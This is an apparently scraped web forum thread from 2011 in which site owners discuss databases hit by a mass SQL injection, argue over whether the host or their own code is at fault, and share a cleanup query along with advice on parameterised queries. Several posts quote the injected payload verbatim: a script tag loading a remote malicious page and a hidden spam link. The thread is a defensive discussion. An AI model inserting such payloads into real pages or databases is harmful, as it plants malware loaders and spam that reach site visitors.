Who are you hosted with I have 5 SQL Databases with GoDaddy and in the last few hours 2 have been infected with the same virus. I am not sure it is SQL Injection as our websites are fairly well secured and there is little to no user passed queries that can
be executed. Neither site is related to the other so I think this is an attack on the Server directly.
I doubt you are with GoDaddy but as you have had this infection today it seems to be a pretty odd similarity!
Right now I am just manually removing the malicious code luckily it has only hit 2 of my smallest databases.
If you come up with a good script, I would appreciate you sharing it :)
I saw the same thing today. It's the second time. It happened a few weeks ago too.
I'm helping someone out that has godaddy sql hosting. I thought it was SQL injection but I see that people here think maybe it isn't.
I'm going to get them off godaddy. Godaddy leaves their db server exposed. I can connect to it from my local computer as long as I have the db password. I can see all of the other databases that are on the server but I can't browse into them. Still that
doesn't feel so secure.
I'm just saying they leave it exposed so that you can open it in SQL Management Stuio remotely and connect right to it and see the names of all hte other databases. That's 100% true.
I am not sure it is SQL Injection as our websites are fairly well secured and there is little to no user passed queries that can be executed.
Do you have any queries that are formed by concatenating strings? If you have, you need to replace them with parameterised queries immediately otherwise you will see a recurrence of the issue regardless of where you host your site.
RegalComputerServices
I think this is an attack on the Server directly
Nonsense. Google "<script src=http://dfrgcc.com/ur.php></script>" to see how many other sites have been affected. They are not all hosted in the same place.
I'm just saying they leave it exposed so that you can open it in SQL Management Stuio remotely and connect right to it and see the names of all hte other databases. That's 100% true.
With other hosts I normally have Error logging setup so that I can view all of the failed attempts by Hackers at SQL Injection it is quite fun to watch all of the different attempts made. With the way Google is setup I have not found a successful way to
enable a custom error logging solution.
As far as the Database goes, one page of one of the sites has a custom search box which does allow for user input which is passed to the database the other does not.
Except for that there is no passing of parameters from the site to the database. All other queries are for data retrieval only.
This is why I do not believe it to be a SQL Injection attack, GoDaddy responded to say they dont believe it is a problem with their server which is kind of typical no host ever admits fault unless they get bombarded by complaints.
I know what a SQL injection attack looks like and this just does not look like one, I could be wrong but two unassociated databases being hit at the same time seems a little weird to me unless it is the database server.
Having had databases hosted with SoftLayer I have had my fair share of experience securing a database from SQL injection so I use Stored Procedures throughout and escape single and double quotes to largely prevent the majority of the basic SQL injection
attempts. I am not saying my site is fool proof as the moment you say that some 12 year old kids pops up that is high on Mountain Dew and hey presto your website is hacked again!
GoDaddy response:
Upon review of your account, I was unable to
find any issues with your database. As you are on a shared server, any
compromises of the server itself would affect many customers and as such, we
would be aware of the issue very quickly. As of right now we have not been
notified of any compromises on any database servers within our system. Please
proceed with changing your passwords and reviewing the security of your
scripting and please let us know if the issue begins to reoccur.
sheraz_aries
Member
277 Points
618 Posts
SQL Injection script
Sep 20, 2011 04:03 PM|LINK
We have SQL injection effect on our database and i can see
</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=7 >crack</a>
placed on almost every single row.
I am trying to do sql replace function to remove that but in the script id value changes( /show.php?id=7)
Is there any other what to grab all of them and replace with ''
Thanks
kwanann
Contributor
3816 Points
750 Posts
MVP
Re: SQL Injection script
Sep 20, 2011 04:14 PM|LINK
assuming you want to replace all these fields with empty string, it could be
update [table] set [field]=''
where [field] like '%http://dfrgcc.com/ur.php%'
View my blog @ http://jefferytay.wordpress.com
Mikesdotnett...
All-Star
154955 Points
19872 Posts
Moderator
MVP
Re: SQL Injection script
Sep 20, 2011 04:14 PM|LINK
You can use regular expressions: http://msdn.microsoft.com/en-us/magazine/cc163473.aspx
Beginning ASP.NET Web Pages with WebMatrix | My Site | Twitter
RegalCompute...
Member
22 Points
11 Posts
Re: SQL Injection script
Sep 20, 2011 09:57 PM|LINK
Who are you hosted with I have 5 SQL Databases with GoDaddy and in the last few hours 2 have been infected with the same virus. I am not sure it is SQL Injection as our websites are fairly well secured and there is little to no user passed queries that can be executed. Neither site is related to the other so I think this is an attack on the Server directly.
I doubt you are with GoDaddy but as you have had this infection today it seems to be a pretty odd similarity!
Right now I am just manually removing the malicious code luckily it has only hit 2 of my smallest databases.
If you come up with a good script, I would appreciate you sharing it :)
Good luck!
wishyouwell
Member
4 Points
2 Posts
Re: SQL Injection script
Sep 21, 2011 01:50 AM|LINK
I saw the same thing today. It's the second time. It happened a few weeks ago too.
I'm helping someone out that has godaddy sql hosting. I thought it was SQL injection but I see that people here think maybe it isn't.
I'm going to get them off godaddy. Godaddy leaves their db server exposed. I can connect to it from my local computer as long as I have the db password. I can see all of the other databases that are on the server but I can't browse into them. Still that doesn't feel so secure.
Mikesdotnett...
All-Star
154955 Points
19872 Posts
Moderator
MVP
Re: SQL Injection script
Sep 21, 2011 04:33 AM|LINK
They are wrong. This problem is most certainly the result of SQL injection.
Wrong and probably libellous. Poor programmers leave their db exposed.
Beginning ASP.NET Web Pages with WebMatrix | My Site | Twitter
wishyouwell
Member
4 Points
2 Posts
Re: SQL Injection script
Sep 21, 2011 04:36 AM|LINK
I'm just saying they leave it exposed so that you can open it in SQL Management Stuio remotely and connect right to it and see the names of all hte other databases. That's 100% true.
Mikesdotnett...
All-Star
154955 Points
19872 Posts
Moderator
MVP
Re: SQL Injection script
Sep 21, 2011 04:39 AM|LINK
Do you have any queries that are formed by concatenating strings? If you have, you need to replace them with parameterised queries immediately otherwise you will see a recurrence of the issue regardless of where you host your site.
Nonsense. Google "<script src=http://dfrgcc.com/ur.php></script>" to see how many other sites have been affected. They are not all hosted in the same place.
Beginning ASP.NET Web Pages with WebMatrix | My Site | Twitter
Mikesdotnett...
All-Star
154955 Points
19872 Posts
Moderator
MVP
Re: SQL Injection script
Sep 21, 2011 04:40 AM|LINK
That doesn't provide an avenue of attack. Check your code after reading this: http://www.mikesdotnetting.com/Article/113/Preventing-SQL-Injection-in-ASP.NET
Beginning ASP.NET Web Pages with WebMatrix | My Site | Twitter
RegalCompute...
Member
22 Points
11 Posts
Re: SQL Injection script
Sep 21, 2011 09:01 AM|LINK
With other hosts I normally have Error logging setup so that I can view all of the failed attempts by Hackers at SQL Injection it is quite fun to watch all of the different attempts made. With the way Google is setup I have not found a successful way to enable a custom error logging solution.
As far as the Database goes, one page of one of the sites has a custom search box which does allow for user input which is passed to the database the other does not.
Except for that there is no passing of parameters from the site to the database. All other queries are for data retrieval only.
This is why I do not believe it to be a SQL Injection attack, GoDaddy responded to say they dont believe it is a problem with their server which is kind of typical no host ever admits fault unless they get bombarded by complaints.
I know what a SQL injection attack looks like and this just does not look like one, I could be wrong but two unassociated databases being hit at the same time seems a little weird to me unless it is the database server.
Having had databases hosted with SoftLayer I have had my fair share of experience securing a database from SQL injection so I use Stored Procedures throughout and escape single and double quotes to largely prevent the majority of the basic SQL injection attempts. I am not saying my site is fool proof as the moment you say that some 12 year old kids pops up that is high on Mountain Dew and hey presto your website is hacked again!
GoDaddy response:
Upon review of your account, I was unable to
find any issues with your database. As you are on a shared server, any
compromises of the server itself would affect many customers and as such, we
would be aware of the issue very quickly. As of right now we have not been
notified of any compromises on any database servers within our system. Please
proceed with changing your passwords and reviewing the security of your
scripting and please let us know if the issue begins to reoccur.